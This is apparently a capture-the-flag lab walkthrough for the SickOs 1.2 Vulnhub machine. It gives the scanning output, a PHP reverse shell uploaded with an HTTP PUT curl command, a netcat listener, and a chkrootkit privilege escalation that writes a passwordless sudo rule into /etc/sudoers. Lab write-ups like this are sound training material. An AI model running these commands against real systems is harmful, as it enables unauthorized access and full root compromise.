Posted on by Melbin Mathew

SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP 192.168.18.0/24

The IP address is 192.168.18.90.

Lets do a detailed scan now

root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.18.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

We have nothing interesting in index.php.

but there is a page /test

Lets use CURL and check allowed HTTP Options.

curl -v -X OPTIONS http://192.168.18.90/test

Here PUT is allowed. Lets try uploading a php shell there.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Lets download this and PUT to the server.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener in our machine

nc -nlvp 5555

and upload to server

curl --upload-file  shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0

Now try to access this in the server. 

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

Looks like a problem with firewall. Lets try on port 443. Edit the file and re-upload to target.

We gota connection from the server. Great.

Lets now try to escalate privileges.

First get a TTY shell with the following command

python -c 'import pty;pty.spawn("/bin/bash")'

Lets have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job with chkrootkit. We have a vulnerability for chkrootkit here.

https://www.exploit-db.com/exploits/33899

chkrootkit will run any executable placed as /tmp/update with root privileges.

Lets create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Here our cron job runs daily. So we need to wait till next time the job runs. Use this command to check if the file is updated.

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.

Now check our privileges.

We are root now. Lets find the flag.

SickOS v2 conquered! Next day next machine!